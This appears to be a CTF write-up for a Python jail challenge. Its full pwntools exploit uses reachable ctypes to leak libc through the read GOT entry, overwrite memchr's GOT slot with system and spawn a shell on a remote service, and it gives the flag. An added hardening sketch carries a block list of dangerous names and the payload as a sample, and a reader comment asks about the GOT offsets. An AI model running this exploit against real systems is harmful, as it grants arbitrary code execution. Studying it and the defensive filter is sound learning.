Tags: pwn 

TL;DR: The jail still has `ctypes` reachable. Use it to load libc, leak libc's base by dumping the `read` GOT entry to stdout, overwrite the `memchr` GOT entry with `system`, then trigger the call through `input()` with `/bin/sh` as the line.

```python
from pwn import *
import sys

LIBC_PATH = '/lib/x86_64-linux-gnu/libc.so.6'  # Ubuntu 18.04
# GOT slots of the server's python3.7 interpreter binary
READ_GOT = 0xa002e0
MEMCHR_GOT = 0xa001a0

libc = ELF(LIBC_PATH)
if len(sys.argv) == 1:
    s = process('python3.7 server.py', shell=True)
else:
    s = remote('66.172.27.144', 9002)

# The jail evaluates one expression; a tuple of calls runs them left to right.
# ctypes.CDLL(input()) loads whatever path we send on the following line.
commands = [
    'ctypes.CDLL(input()).write(1, {}, 8)'.format(READ_GOT),   # leak libc: write read@GOT to stdout
    'ctypes.CDLL(input()).read(0, {}, 8)'.format(MEMCHR_GOT),  # overwrite memchr@GOT with 8 bytes from stdin
    'input()'                                                  # trigger a call to memchr on the line we send
]

p = ','.join(commands).replace(' ', '')
s.sendlineafter('code: ', p)

# leak: the 8 bytes received are read's address inside libc
s.sendline(LIBC_PATH)
libc.address = u64(s.recv().ljust(8, b'\x00')) - libc.symbols['read']
print('libc @ ' + hex(libc.address))

# overwrite: path for the second CDLL, then the 8-byte address of system for read()
s.sendline(LIBC_PATH)
sleep(0.1)  # make sure the path and the 8-byte payload arrive in separate packets
s.send(p64(libc.symbols['system']))

# exec: input() calls memchr (now system) on the received line
s.sendline('/bin/sh')

s.interactive()
```

Flag: `SUSEC{00f_i_f0rg0t_t0_unl0ad_ctypes}`
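From the jail author's side, the root cause in the flag text ("forgot to unload ctypes") is that the evaluated expression can reach a module that hands out raw memory access. Below is an added, hypothetical hardening sketch (not the challenge's `server.py`, which is not on the page): a static AST policy that rejects names like `ctypes`, imports and dunder attribute access, plus evaluation in a namespace with a small builtins allow-list and no `__import__`. It is run against the page's own payload, reconstructed as a constructed sample string.

```python
import ast

# Constructed sample: the writeup's payload with spaces stripped, as sent to the jail.
PAGE_PAYLOAD = (
    "ctypes.CDLL(input()).write(1,0xa002e0,8),"
    "ctypes.CDLL(input()).read(0,0xa001a0,8),"
    "input()"
)

# Names that give native code execution or arbitrary memory access from Python.
FORBIDDEN_NAMES = {"ctypes", "cffi", "__import__", "eval", "exec", "open", "compile"}

# Hypothetical allow-list: nothing here can load native code or touch memory.
SAFE_BUILTINS = {"abs": abs, "len": len, "min": min, "max": max, "range": range,
                 "sum": sum, "str": str, "int": int, "list": list, "print": print}


def check_untrusted(src):
    """Return None if src passes the static policy, else a reason string.
    The AST walk is defence-in-depth only: an in-process Python sandbox is not
    made robust by a static filter alone, so ctypes must also be absent from
    the namespace the code runs in (see run_untrusted)."""
    try:
        tree = ast.parse(src, mode="eval")  # the jail evaluates one expression
    except SyntaxError as e:
        return "syntax error: %s" % e
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            return "imports are not allowed"
        if isinstance(node, ast.Name) and node.id in FORBIDDEN_NAMES:
            return "forbidden name: %s" % node.id
        if isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            return "dunder attribute access: %s" % node.attr
    return None


def run_untrusted(src):
    """Evaluate src only if the policy passes, in a namespace that contains
    neither ctypes nor __import__, so the module cannot be reached even if a
    name slips past the static check."""
    reason = check_untrusted(src)
    if reason is not None:
        raise ValueError(reason)
    return eval(compile(src, "<untrusted>", "eval"), {"__builtins__": SAFE_BUILTINS}, {})
```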

ARO7I, March 22, 2020, 7:52 a.m.

How do I get the `READ_GOT` and `MEMCHR_GOT`?